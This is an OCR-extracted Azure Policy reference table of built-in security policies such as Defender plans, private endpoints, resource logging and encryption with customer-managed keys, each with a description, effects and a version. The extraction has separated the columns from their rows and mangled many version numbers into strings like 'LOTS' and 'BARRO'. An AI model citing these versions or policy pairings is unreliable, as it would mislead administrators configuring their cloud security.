installed on Azure Arc enabled Linux server. 


Effect(s) 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 


disabled, Disabled 


audit, Audit, deny, Deny, 


disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


AuditlfNotExists, Disabled 


Version 


(GitHub) 


6.1.04 


8.1.07 


9.1.06 


8.1.07 


4.1.0 2 


ZIO 


5.102 


410% 


1.1.0¢ 


Policy name 
(Azure portal) 


Analytics agent 


installed on Azure Arc? 


Linux machines 
should meet 
requirements for the 
Azure compute 
security baseline Z 


Log Analytics agent 
should be installed on 
your virtual machine 
for Azure Security 
Center monitoring E 


Log Analytics agent 
should be installed on 
your virtual machine 
scale sets for Azure 
Security Center 
monitoring E 


Machines should be 
configured to 
periodically check for 
missing system 
updates 7 


Machines should have 
secret findings 
resolved 7 


Management ports of 
virtual machines 
should be protected 
with just-in-time 
network access 
control 7 


Management ports 
should be closed on 
your virtual machines 7 


Microsoft Defender 
CSPM should be 
enabled £ 


Microsoft Defender 
for Containers should 
be enabled # 


Description 


Requires that prerequisites are deployed to the policy 
assignment scope. For details, visit https://aka.ms/gcpol z . 
Machines are non-compliant if the machine is not configured 
correctly for one of the recommendations in the Azure 
compute security baseline. 


This policy audits any Windows/Linux virtual machines (VMs) 
if the Log Analytics agent is not installed which Security 
Center uses to monitor for security vulnerabilities and threats 


Security Center collects data from your Azure virtual 
machines (VMs) to monitor for security vulnerabilities and 
threats. 


To ensure periodic assessments for missing system updates 
are triggered automatically every 24 hours, the 
AssessmentMode property should be set to 
‘AutomaticByPlatform’. Learn more about AssessmentMode 
property for Windows: https://aka.ms/computevm- 
windowspatchassessmentmode, SZ for Linux: 
https://aka.ms/computevm-linuxpatchassessmentmode z7. 


Audits virtual machines to detect whether they contain secret 
findings from the secret scanning solutions on your virtual 
machines. 


Possible network Just In Time (JIT) access will be monitored 
by Azure Security Center as recommendations 


Open remote management ports are exposing your VM to a 
high level of risk from Internet-based attacks. These attacks 
attempt to brute force credentials to gain admin access to 
the machine. 


Defender Cloud Security Posture Management (CSPM) 
provides enhanced posture capabilities and a new intelligent 
cloud security graph to help identify, prioritize, and reduce 
risk. Defender CSPM is available in addition to the free 
foundational security posture capabilities turned on by 
default in Defender for Cloud. 


Microsoft Defender for Containers provides hardening, 
vulnerability assessment and run-time protections for your 
Azure, hybrid, and multi-cloud Kubernetes environments. 


Effect(s) 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Audit, Deny, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Version 


(GitHub) 


21.08 


1.0.0 4 


1.0.0 £ 


34.12 


1.0.2 


3.0.0 4 


3.0.0 Z 


1.0.02 


1.0.0 @ 


Policy name 


(Azure portal) 


Microsoft Defender 
for SQL status should 
be protected for Arc- 
enabled SQL Servers Z 


Microsoft Defender 
for Storage (Classic) 
should be enabled € 


Microsoft Defender 
for Storage should be 
enabled Z 


Monitor missing 
Endpoint Protection 
in Azure Security 
Center £ 


MySQL servers should 
use customer- 
managed keys to 
encrypt data at rest 7 


Network Watcher 
should be enabled Z 


Non-internet-facing 
virtual machines 
should be protected 
with network security 
groups E 


Only secure 
connections to your 
Azure Cache for Redis 
should be enabled Z 


Description 


Microsoft Defender for SQL provides functionality for 
surfacing and mitigating potential database vulnerabilities, 
detecting anomalous activities that could indicate threats to 
SQL databases, discovering and classifying sensitive data. 
Once enabled, the protection status indicates that the 
resource is actively monitored. Even when Defender is 
enabled, multiple configuration settings should be validated 
on the agent, machine, workspace and SQL server to ensure 
active protection. 


Microsoft Defender for Storage (Classic) provides detections 
of unusual and potentially harmful attempts to access or 
exploit storage accounts. 


Microsoft Defender for Storage detects potential threats to 
your storage accounts. It helps prevent the three major 
impacts on your data and workload: malicious file uploads, 
sensitive data exfiltration, and data corruption. The new 
Defender for Storage plan includes Malware Scanning and 
Sensitive Data Threat Detection. This plan also provides a 
predictable pricing structure (per storage account) for 
control over coverage and costs. 


Servers without an installed Endpoint Protection agent will 
be monitored by Azure Security Center as recommendations 


Use customer-managed keys to manage the encryption at 
rest of your MySQL servers. By default, the data is encrypted 
at rest with service-managed keys, but customer-managed 
keys are commonly required to meet regulatory compliance 
standards. Customer-managed keys enable the data to be 
encrypted with an Azure Key Vault key created and owned by 
you. You have full control and responsibility for the key 
lifecycle, including rotation and management. 


Network Watcher is a regional service that enables you to 
monitor and diagnose conditions at a network scenario level 
in, to, and from Azure. Scenario level monitoring enables you 
to diagnose problems at an end to end network level view. It 
is required to have a network watcher resource group to be 
created in every region where a virtual network is present. An 
alert is enabled if a network watcher resource group is not 
available in a particular region. 


Protect your non-internet-facing virtual machines from 
potential threats by restricting access with network security 
groups (NSG). Learn more about controlling traffic with NSGs 
at https://aka.ms/nsg-doc Z 


Audit enabling of only connections via SSL to Azure Cache 
for Redis. Use of secure connections ensures authentication 
between the server and the service and protects data in 
transit from network layer attacks such as man-in-the- 
middle, eavesdropping, and session-hijacking 


Effect(s) 


Audit, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Audit, Deny, Disabled 


Version 


(GitHub) 


LOTS 


1.04% 


1.0.0 4 


3.0.0 2 


1.04% 


3.0.0 Z 


3.0.02 


1.0.0¢ 


Policy name 


(Azure portal) 


PostgreSQL servers 
should use customer- 
managed keys to 
encrypt data at rest 7 


Private endpoint 
connections on Azure 
SQL Database should 
be enabled Z 


Private endpoint 
should be enabled for 
MariaDB servers E 


Private endpoint 
should be enabled for 
MySQL servers E 


Private endpoint 
should be enabled for 
PostgreSQL servers E 


Public network access 
on Azure SQL 
Database should be 
disabled č 


Public network access 
should be disabled 
for MariaDB servers 7 


Public network access 
should be disabled 
for MySQL servers 7 


Public network access 
should be disabled 


Description 


Use customer-managed keys to manage the encryption at 
rest of your PostgreSQL servers. By default, the data is 
encrypted at rest with service-managed keys, but customer- 
managed keys are commonly required to meet regulatory 
compliance standards. Customer-managed keys enable the 
data to be encrypted with an Azure Key Vault key created 
and owned by you. You have full control and responsibility 
for the key lifecycle, including rotation and management. 


Private endpoint connections enforce secure communication 
by enabling private connectivity to Azure SQL Database. 


Private endpoint connections enforce secure communication 
by enabling private connectivity to Azure Database for 
MariaDB. Configure a private endpoint connection to enable 
access to traffic coming only from known networks and 
prevent access from all other IP addresses, including within 
Azure. 


Private endpoint connections enforce secure communication 
by enabling private connectivity to Azure Database for 
MySQL. Configure a private endpoint connection to enable 
access to traffic coming only from known networks and 
prevent access from all other IP addresses, including within 
Azure. 


Private endpoint connections enforce secure communication 
by enabling private connectivity to Azure Database for 
PostgreSQL. Configure a private endpoint connection to 
enable access to traffic coming only from known networks 
and prevent access from all other IP addresses, including 
within Azure. 


Disabling the public network access property improves 
security by ensuring your Azure SQL Database can only be 
accessed from a private endpoint. This configuration denies 


all logins that match IP or virtual network based firewall rules. 


Disable the public network access property to improve 
security and ensure your Azure Database for MariaDB can 
only be accessed from a private endpoint. This configuration 
strictly disables access from any public address space outside 
of Azure IP range, and denies all logins that match IP or 
virtual network-based firewall rules. 


Disable the public network access property to improve 
security and ensure your Azure Database for MySQL can only 
be accessed from a private endpoint. This configuration 
strictly disables access from any public address space outside 
of Azure IP range, and denies all logins that match IP or 
virtual network-based firewall rules. 


Disable the public network access property to improve 
security and ensure your Azure Database for PostgreSQL can 
only be accessed from a private endpoint. This configuration 


Effect(s) 


AuditlfNotExists, Disabled 


Audit, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Audit, Deny, Disabled 


Audit, Deny, Disabled 


Audit, Deny, Disabled 


Audit, Deny, Disabled 


Version 


(GitHub) 


1.04% 


1.1.02 


1.0.24 


LOZE 


1028 


1.10.2 


2.0.0 7 


20.07 


20.18 


Policy name 


(Azure portal) 


for PostgreSQL 
servers č 


Resource logs in 
Azure Data Lake Store 
should be enabled zZ 


Resource logs in 
Azure Databricks 
Workspaces should 
be enabled 7 


Resource logs in 
Azure Kubernetes 
Service should be 
enabled zZ 


Resource logs in 
Azure Machine 
Learning Workspaces 
should be enabled £ 


Resource logs in 
Azure Stream 
Analytics should be 
enabled Z 


Resource logs in 
Batch accounts 
should be enabled ¢ 


Resource logs in Data 
Lake Analytics should 
be enabled č 


Resource logs in 
Event Hub should be 
enabled 7 


Resource logs in loT 
Hub should be 
enabled Z 


Resource logs in Key 
Vault should be 
enabled Z 


Resource logs in Logic 
Apps should be 
enabled Z 


Description 


disables access from any public address space outside of 
Azure IP range, and denies all logins that match IP or virtual 
network-based firewall rules. 


Audit enabling of resource logs. This enables you to recreate 
activity trails to use for investigation purposes; when a 
security incident occurs or when your network is 
compromised 


Resource logs enable recreating activity trails to use for 
investigation purposes when a security incident occurs or 
when your network is compromised. 


Azure Kubernetes Service's resource logs can help recreate 
activity trails when investigating security incidents. Enable it 
to make sure the logs will exist when needed 


Resource logs enable recreating activity trails to use for 
investigation purposes when a security incident occurs or 
when your network is compromised. 


Audit enabling of resource logs. This enables you to recreate 
activity trails to use for investigation purposes; when a 
security incident occurs or when your network is 
compromised 


Audit enabling of resource logs. This enables you to recreate 
activity trails to use for investigation purposes; when a 
security incident occurs or when your network is 
compromised 


Audit enabling of resource logs. This enables you to recreate 
activity trails to use for investigation purposes; when a 
security incident occurs or when your network is 
compromised 


Audit enabling of resource logs. This enables you to recreate 
activity trails to use for investigation purposes; when a 
security incident occurs or when your network is 
compromised 


Audit enabling of resource logs. This enables you to recreate 
activity trails to use for investigation purposes; when a 
security incident occurs or when your network is 
compromised 


Audit enabling of resource logs. This enables you to recreate 
activity trails to use for investigation purposes when a 
security incident occurs or when your network is 
compromised 


Audit enabling of resource logs. This enables you to recreate 
activity trails to use for investigation purposes; when a 
security incident occurs or when your network is 
compromised 


Effect(s) 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Version 


(GitHub) 


5.0.0 7 


BARRO 


1.0.0 Z 


10.12 


ELAKO 


5.0.02 


5.0.0 £ 


5.0.07 


3102 


5.0.02 


5.1.0¢ 


Policy name 


(Azure portal) 


Resource logs in 
Search services 
should be enabled Z 


Resource logs in 
Service Bus should be 
enabled Z 


Running container 
images should have 
vulnerability findings 
resolved Z 


Running container 
images should have 
vulnerability findings 
resolved (powered by 
Microsoft Defender 
Vulnerability 
Management) E 


Secure transfer to 
storage accounts 
should be enabled zZ 


Service Fabric clusters 
should have the 
ClusterProtectionLevel 
property set to 
EncryptAndSign ¢ 


Service Fabric clusters 
should only use Azure 
Active Directory for 

client authentication £ 


SQL databases should 
have vulnerability 
findings resolved Z 


SQL managed 
instances should use 
customer-managed 
keys to encrypt data 
at rest £ 


SQL servers on 
machines should have 


Description 


Audit enabling of resource logs. This enables you to recreate 
activity trails to use for investigation purposes; when a 
security incident occurs or when your network is 
compromised 


Audit enabling of resource logs. This enables you to recreate 
activity trails to use for investigation purposes; when a 
security incident occurs or when your network is 
compromised 


Container image vulnerability assessment scans container 
images running on your Kubernetes clusters for security 
vulnerabilities and exposes detailed findings for each image. 
Resolving the vulnerabilities can greatly improve your 
containers’ security posture and protect them from attacks. 


Container image vulnerability assessment scans your registry 
for commonly known vulnerabilities (CVEs) and provides a 
detailed vulnerability report for each image. This 
recommendation provides visibility to vulnerable images 
currently running in your Kubernetes clusters. Remediating 
vulnerabilities in container images that are currently running 
is key to improving your security posture, significantly 


reducing the attack surface for your containerized workloads. 


Audit requirement of Secure transfer in your storage account. 


Secure transfer is an option that forces your storage account 
to accept requests only from secure connections (HTTPS). 
Use of HTTPS ensures authentication between the server and 
the service and protects data in transit from network layer 
attacks such as man-in-the-middle, eavesdropping, and 
session-hijacking 


Service Fabric provides three levels of protection (None, Sign 
and EncryptAndSign) for node-to-node communication 
using a primary cluster certificate. Set the protection level to 
ensure that all node-to-node messages are encrypted and 
digitally signed 


Audit usage of client authentication only via Azure Active 
Directory in Service Fabric 


Monitor vulnerability assessment scan results and 
recommendations for how to remediate database 
vulnerabilities. 


Implementing Transparent Data Encryption (TDE) with your 
own key provides you with increased transparency and 
control over the TDE Protector, increased security with an 
HSM-backed external service, and promotion of separation 
of duties. This recommendation applies to organizations with 
a related compliance requirement. 


SQL vulnerability assessment scans your database for 
security vulnerabilities, and exposes any deviations from best 
practices such as misconfigurations, excessive permissions, 


Effect(s) 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Audit, Deny, Disabled 


Audit, Deny, Disabled 


Audit, Deny, Disabled 


AuditlfNotExists, Disabled 


Audit, Deny, Disabled 


AuditlfNotExists, Disabled 


Version 


(GitHub) 


5.0.0 Z 


5.0.0% 


1.0.24 


1.0.0 4 


2.0.0 7 


1.1.02 


1.102 


4.1.0 2 


2.0.0 Z 


1.0.0¢ 


Policy name 


(Azure portal) 


vulnerability findings 
resolved & 


SQL servers should 
use customer- 
managed keys to 
encrypt data at rest 7 


SQL servers with 
auditing to storage 
account destination 
should be configured 
with 90 days retention 
or higher £ 


Storage accounts 
should be migrated to 
new Azure Resource 
Manager resources E 


Storage accounts 
should prevent shared 
key access E 


Storage accounts 
should restrict 
network access E 


Storage accounts 
should restrict 
network access using 
virtual network rules č 


Storage accounts 
should use customer- 
managed key for 
encryption? 


Storage accounts 
should use private 
link Z 


Description 


and unprotected sensitive data. Resolving the vulnerabilities 
found can greatly improve your database security posture. 


Implementing Transparent Data Encryption (TDE) with your 
own key provides increased transparency and control over 
the TDE Protector, increased security with an HSM-backed 
external service, and promotion of separation of duties. This 
recommendation applies to organizations with a related 
compliance requirement. 


For incident investigation purposes, we recommend setting 
the data retention for your SQL Server' auditing to storage 
account destination to at least 90 days. Confirm that you are 
meeting the necessary retention rules for the regions in 
which you are operating. This is sometimes required for 
compliance with regulatory standards. 


Use new Azure Resource Manager for your storage accounts 
to provide security enhancements such as: stronger access 
control (RBAC), better auditing, Azure Resource Manager 
based deployment and governance, access to managed 
identities, access to key vault for secrets, Azure AD-based 
authentication and support for tags and resource groups for 
easier security management 


Audit requirement of Azure Active Directory (Azure AD) to 
authorize requests for your storage account. By default, 
requests can be authorized with either Azure Active Directory 
credentials, or by using the account access key for Shared 
Key authorization. Of these two types of authorization, Azure 
AD provides superior security and ease of use over Shared 
Key, and is recommended by Microsoft. 


Network access to storage accounts should be restricted. 
Configure network rules so only applications from allowed 
networks can access the storage account. To allow 
connections from specific internet or on-premises clients, 
access can be granted to traffic from specific Azure virtual 
networks or to public internet IP address ranges 


Protect your storage accounts from potential threats using 
virtual network rules as a preferred method instead of IP- 
based filtering. Disabling IP-based filtering prevents public 
IPs from accessing your storage accounts. 


Secure your blob and file storage account with greater 
flexibility using customer-managed keys. When you specify a 
customer-managed key, that key is used to protect and 
control access to the key that encrypts your data. Using 
customer-managed keys provides additional capabilities to 
control rotation of the key encryption key or 
cryptographically erase data. 


Azure Private Link lets you connect your virtual network to 
Azure services without a public IP address at the source or 
destination. The Private Link platform handles the 
connectivity between the consumer and services over the 
Azure backbone network. By mapping private endpoints to 


Effect(s) 


Audit, Deny, Disabled 


AuditlfNotExists, Disabled 


Audit, Deny, Disabled 


Audit, Deny, Disabled 


Audit, Deny, Disabled 


Audit, Deny, Disabled 


Audit, Disabled 


AuditlfNotExists, Disabled 


Version 


(GitHub) 


2018 


3.0.0 Z 


1.0.0 4 


2.0.04 


LTA 


1.0.14 


1.03¢ 


2.0.02 


Policy name 


(Azure portal) 


Subnets should be 
associated with a 
Network Security 
Group? 


Subscriptions should 
have a contact email 
address for security 
issues 7 


Synapse Workspaces 
should use only Azure 
Active Directory 
identities for 
authentication € 


System updates on 
virtual machine scale 
sets should be 
installed Z 


System updates 
should be installed on 
your machines £? 


There should be more 
than one owner 
assigned to your 
subscription £ 


Transparent Data 
Encryption on SQL 
databases should be 
enabled ¢ 


Virtual machines and 
virtual machine scale 
sets should have 
encryption at host 
enabled Z 


Virtual machines 
should be migrated to 
new Azure Resource 
Manager resources E 


Description Effect(s) Version 


(GitHub) 


your storage account, data leakage risks are reduced. Learn 
more about private links at - 
https://aka.ms/azureprivatelinkoverview £ 


Protect your subnet from potential threats by restricting AuditlfNotExists, Disabled 3.0.0 Z 
access to it with a Network Security Group (NSG). NSGs 
contain a list of Access Control List (ACL) rules that allow or 


deny network traffic to your subnet. 


To ensure the relevant people in your organization are AuditlfNotExists, Disabled 1.0.1 Z 
notified when there is a potential security breach in one of 
your subscriptions, set a security contact to receive email 


notifications from Security Center. 


Azure Active Directory (AAD) only authentication methods 1.0.0 Z 
improves security by ensuring that Synapse Workspaces 
exclusively require AAD identities for authentication. Learn 


more at: https://aka.ms/Synapse E. 


Audit, Deny, Disabled 


Audit whether there are any missing system security updates AuditlfNotExists, Disabled 3.0.0 Z 
and critical updates that should be installed to ensure that 
your Windows and Linux virtual machine scale sets are 


secure. 


Missing security system updates on your servers will be AuditlfNotExists, Disabled 4.0.07 


monitored by Azure Security Center as recommendations 


It is recommended to designate more than one subscription  AuditIlfNotExists, Disabled 3.0.07 


owner in order to have administrator access redundancy. 


Transparent data encryption should be enabled to protect AuditlfNotExists, Disabled 2.0.07 


data-at-rest and meet compliance requirements 


Use encryption at host to get end-to-end encryption for your 1.0.07 
virtual machine and virtual machine scale set data. 
Encryption at host enables encryption at rest for your 


temporary disk and OS/data disk caches. Temporary and 


Audit, Deny, Disabled 


ephemeral OS disks are encrypted with platform-managed 
keys when encryption at host is enabled. OS/data disk caches 
are encrypted at rest with either customer-managed or 
platform-managed key, depending on the encryption type 
selected on the disk. Learn more at https://aka.ms/vm-hbe @. 


Use new Azure Resource Manager for your virtual machines Audit, Deny, Disabled 1.0.0 Z 
to provide security enhancements such as: stronger access 

control (RBAC), better auditing, Azure Resource Manager 

based deployment and governance, access to managed 

identities, access to key vault for secrets, Azure AD-based 

authentication and support for tags and resource groups for 


easier security management 


Policy name 


(Azure portal) 


Virtual machines 
should encrypt temp 
disks, caches, and 
data flows between 
Compute and Storage 
resources E 


Virtual machines’ 
Guest Configuration 
extension should be 
deployed with 
system-assigned 
managed identity ¢ 


VM Image Builder 
templates should use 
private link £ 


VPN gateways should 
use only Azure Active 
Directory (Azure AD) 
authentication for 
point-to-site users Z 


Vulnerabilities in 
container security 
configurations should 
be remediated 7 


Vulnerabilities in 
security configuration 
on your machines 
should be remediated ” 


Vulnerabilities in 
security configuration 
on your virtual 

machine scale sets 
should be remediated 7 


Vulnerability 
assessment should be 
enabled on SQL 
Managed Instance E 


Vulnerability 
assessment should be 


Description 


By default, a virtual machine's OS and data disks are 
encrypted-at-rest using platform-managed keys. Temp disks, 
data caches and data flowing between compute and storage 
aren't encrypted. Disregard this recommendation if: 1. using 
encryption-at-host, or 2. server-side encryption on Managed 
Disks meets your security requirements. Learn more in: 
Server-side encryption of Azure Disk Storage: 
https://aka.ms/disksse, “ Different disk encryption offerings: 
https://aka.ms/diskencryptioncomparison E 


The Guest Configuration extension requires a system 
assigned managed identity. Azure virtual machines in the 
scope of this policy will be non-compliant when they have 
the Guest Configuration extension installed but do not have 
a system assigned managed identity. Learn more at 
https://aka.ms/gcpol Z 


Azure Private Link lets you connect your virtual network to 
Azure services without a public IP address at the source or 
destination. The Private Link platform handles the 
connectivity between the consumer and services over the 
Azure backbone network. By mapping private endpoints to 
your VM Image Builder building resources, data leakage risks 
are reduced. Learn more about private links at: 
https://docs.microsoft.com/azure/virtual- 
machines/linux/image-builder-networking#deploy-using-an- 
existing-vnet. 


Disabling local authentication methods improves security by 
ensuring that VPN Gateways use only Azure Active Directory 
identities for authentication. Learn more about Azure AD 
authentication at https://docs.microsoft.com/azure/vpn- 
gateway/openvpn-azure-ad-tenant 


Audit vulnerabilities in security configuration on machines 
with Docker installed and display as recommendations in 
Azure Security Center. 


Servers which do not satisfy the configured baseline will be 
monitored by Azure Security Center as recommendations 


Audit the OS vulnerabilities on your virtual machine scale 
sets to protect them from attacks. 


Audit each SQL Managed Instance which doesn't have 
recurring vulnerability assessment scans enabled. 
Vulnerability assessment can discover, track, and help you 
remediate potential database vulnerabilities. 


Audit Azure SQL servers which do not have vulnerability 
assessment properly configured. Vulnerability assessment 


Effect(s) 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Audit, Disabled, Deny 


Audit, Deny, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Version 


(GitHub) 


did 


10.1 


1.1.02 


1.0.0 


30.08 


3.1.02 


3.0.0 2 


1.0.12 


3.0.0 Z 


Policy name 
(Azure portal) 


enabled on your SQL 
servers č 


Web Application 
Firewall (WAF) should 
be enabled for 
Application Gateway E 


Windows Defender 
Exploit Guard should 
be enabled on your 
machines E 


Windows machines 
should be configured 
to use secure 
communication 
protocols E 


Windows machines 
should have Log 
Analytics agent 
installed on Azure Arc? 


Windows machines 
should meet 
requirements of the 
Azure compute 
security baseline Z 


Description 


can discover, track, and help you remediate potential 
database vulnerabilities. 


Deploy Azure Web Application Firewall (WAF) in front of 
public facing web applications for additional inspection of 
incoming traffic. Web Application Firewall (WAF) provides 
centralized protection of your web applications from 
common exploits and vulnerabilities such as SQL injections, 
Cross-Site Scripting, local and remote file executions. You can 
also restrict access to your web applications by countries, IP 
address ranges, and other http(s) parameters via custom 
rules. 


Windows Defender Exploit Guard uses the Azure Policy Guest 
Configuration agent. Exploit Guard has four components that 
are designed to lock down devices against a wide variety of 
attack vectors and block behaviors commonly used in 
malware attacks while enabling enterprises to balance their 
security risk and productivity requirements (Windows only). 


To protect the privacy of information communicated over the 
Internet, your machines should use the latest version of the 
industry-standard cryptographic protocol, Transport Layer 
Security (TLS). TLS secures communications over a network 
by encrypting a connection between machines. 


Machines are non-compliant if Log Analytics agent is not 
installed on Azure Arc enabled windows server. 


Requires that prerequisites are deployed to the policy 
assignment scope. For details, visit https://aka.ms/gcpol z . 
Machines are non-compliant if the machine is not configured 
correctly for one of the recommendations in the Azure 
compute security baseline. 


Microsoft Defender for Cloud category 


Name 


(Azure portal) 


[Preview]: API 
endpoints in Azure API 
Management should be 
authenticated 7 


[Preview]: API 
endpoints that are 
unused should be 


Description 


API endpoints published within Azure API Management 
should enforce authentication to help minimize security 
risk. Authentication mechanisms are sometimes 
implemented incorrectly or are missing. This allows 
attackers to exploit implementation flaws and to access 
data. Learn More about the OWASP API Threat for Broken 
User Authentication here: 
https://learn.microsoft.com/azure/api- 
management/mitigate-owasp-api-threats#broken-user- 
authentication 


As a security best practice, API endpoints that haven't 
received traffic for 30 days are considered unused and 
should be removed from the Azure API Management 


Effect(s) 


Audit, Deny, Disabled 


Version 


(GitHub) 


2.0.04 


AuditlfNotExists, Disabled 2.0.0 Z 


AuditlfNotExists, Disabled 4.1.17 


AuditlfNotExists, Disabled 2.0.07 


AuditlfNotExists, Disabled 2.0.07 


Effect(s) 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Version 


(GitHub) 


1.0.0- 
preview E 


1.0.0- 
preview E 


Name 


(Azure portal) 


disabled and removed 
from the Azure API 
Management service 7 


[Preview]: Azure 
Security agent should 
be installed on your 
Linux Arc machines & 


[Preview]: Azure 
Security agent should 
be installed on your 
Linux virtual machine 
scale sets 7 


[Preview]: Azure 
Security agent should 
be installed on your 
Linux virtual machines z 


[Preview]: Azure 
Security agent should 
be installed on your 


Windows Arc machines Z 


[Preview]: Azure 
Security agent should 
be installed on your 
Windows virtual 
machine scale sets 7 


[Preview]: Azure 
Security agent should 
be installed on your 
Windows virtual 
machines E 


[Preview]: 
ChangeTracking 
extension should be 
installed on your Linux 
Arc machine E 


[Preview]: 
ChangeTracking 
extension should be 
installed on your Linux 
virtual machine 2 


Description 


service. Keeping unused API endpoints may pose a security 
risk to your organization. These may be APIs that should 
have been deprecated from the Azure API Management 
service but may have been accidentally left active. Such 
APIs typically do not receive the most up to date security 
coverage. 


Install the Azure Security agent on your Linux Arc machines 
in order to monitor your machines for security 
configurations and vulnerabilities. Results of the 
assessments can seen and managed in Azure Security 
Center. 


Install the Azure Security agent on your Linux virtual 
machine scale sets in order to monitor your machines for 
security configurations and vulnerabilities. Results of the 
assessments can seen and managed in Azure Security 
Center. 


Install the Azure Security agent on your Linux virtual 
machines in order to monitor your machines for security 
configurations and vulnerabilities. Results of the 
assessments can seen and managed in Azure Security 
Center. 


Install the Azure Security agent on your Windows Arc 
machines in order to monitor your machines for security 
configurations and vulnerabilities. Results of the 
assessments can seen and managed in Azure Security 
Center. 


Install the Azure Security agent on your Windows virtual 
machine scale sets in order to monitor your machines for 
security configurations and vulnerabilities. Results of the 
assessments can seen and managed in Azure Security 
Center. 


Install the Azure Security agent on your Windows virtual 
machines in order to monitor your machines for security 
configurations and vulnerabilities. Results of the 
assessments can seen and managed in Azure Security 
Center. 


Install ChangeTracking Extension on Linux Arc machines to 
enable File Integrity Monitoring(FIM) in Azure Security 
Center. FIM examines operating system files, Windows 
registries, application software, Linux system files, and 
more, for changes that might indicate an attack. The 
extension can be installed in virtual machines and locations 
supported by Azure Monitoring Agent. 


Install ChangeTracking Extension on Linux virtual machines 
to enable File Integrity Monitoring(FIM) in Azure Security 
Center. FIM examines operating system files, Windows 
registries, application software, Linux system files, and 
more, for changes that might indicate an attack. The 


Effect(s) 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Version 


(GitHub) 


1.0.0- 
preview E 


2.0.0- 
preview E 


2.0.0- 
preview E 


1.0.0- 
preview E 


2.1.0- 
preview E 


2.1.0- 
preview E 


1.0.0- 
preview E 


2.0.0- 
preview E 


Name 


(Azure portal) 


[Preview]: 
ChangeTracking 
extension should be 
installed on your Linux 
virtual machine scale 
sets 2 


[Preview]: 
ChangeTracking 
extension should be 
installed on your 
Windows Arc machine Si 


[Preview]: 
ChangeTracking 
extension should be 
installed on your 
Windows virtual 
machine Z 


[Preview]: 
ChangeTracking 
extension should be 
installed on your 
Windows virtual 
machine scale sets 7 


[Preview]: Configure 
Arc machines to create 
the default Microsoft 
Defender for Cloud 
pipeline using Azure 
Monitor Agent £ 


[Preview]: Configure 
Arc machines to create 
the Microsoft Defender 
for Cloud user-defined 
pipeline using Azure 
Monitor Agent Z 


[Preview]: Configure 
Arc-enabled SQL 
Servers to automatically 


Description 


extension can be installed in virtual machines and locations 
supported by Azure Monitoring Agent. 


Install ChangeTracking Extension on Linux virtual machine 
scale sets to enable File Integrity Monitoring(FIM) in Azure 
Security Center. FIM examines operating system files, 
Windows registries, application software, Linux system files, 
and more, for changes that might indicate an attack. The 
extension can be installed in virtual machines and locations 
supported by Azure Monitoring Agent. 


Install ChangeTracking Extension on Windows Arc machines 
to enable File Integrity Monitoring(FIM) in Azure Security 
Center. FIM examines operating system files, Windows 
registries, application software, Linux system files, and 
more, for changes that might indicate an attack. The 
extension can be installed in virtual machines and locations 
supported by Azure Monitoring Agent. 


Install ChangeTracking Extension on Windows virtual 
machines to enable File Integrity Monitoring(FIM) in Azure 
Security Center. FIM examines operating system files, 
Windows registries, application software, Linux system files, 
and more, for changes that might indicate an attack. The 
extension can be installed in virtual machines and locations 
supported by Azure Monitoring Agent. 


Install ChangeTracking Extension on Windows virtual 
machine scale sets to enable File Integrity Monitoring(FIM) 
in Azure Security Center. FIM examines operating system 
files, Windows registries, application software, Linux system 
files, and more, for changes that might indicate an attack. 
The extension can be installed in virtual machines and 
locations supported by Azure Monitoring Agent. 


Configure Arc machines to create the default Microsoft 
Defender for Cloud pipeline using Azure Monitor Agent. 
Microsoft Defender for Cloud collects events from the 
agent and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Create a resource 
group, a Data Collection Rule and Log Analytics workspace 
in the same region as the machine to store audit records. 
Target virtual machines must be in a supported location. 


Configure Arc machines to create the Microsoft Defender 
for Cloud user-defined pipeline using Azure Monitor Agent. 
Microsoft Defender for Cloud collects events from the 
agent and uses them to provide security alerts and tailored 
hardening tasks (recommendations). Use the user-provided 
Log Analytics workspace to store audit records. Create a 
resource group and a Data Collection Rule in the same 
region as the user-provided Log Analytics workspace. 
Target Arc machines must be in a supported location. 


Automate the deployment of Azure Monitor Agent 
extension on your Windows Arc-enabled SQL Servers. Learn 
more: https://aka.ms/AMAOverview E. 


Effect(s) 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


Version 


(GitHub) 


2.0.0- 
preview E 


1.0.0- 
preview 2 


2.0.0- 
preview E 


2.0.0- 
preview E 


1.2.0- 
preview E 


1.2.0- 
preview E 


HA de 
preview E 


Name 


(Azure portal) 


install Azure Monitor 
Agent č 


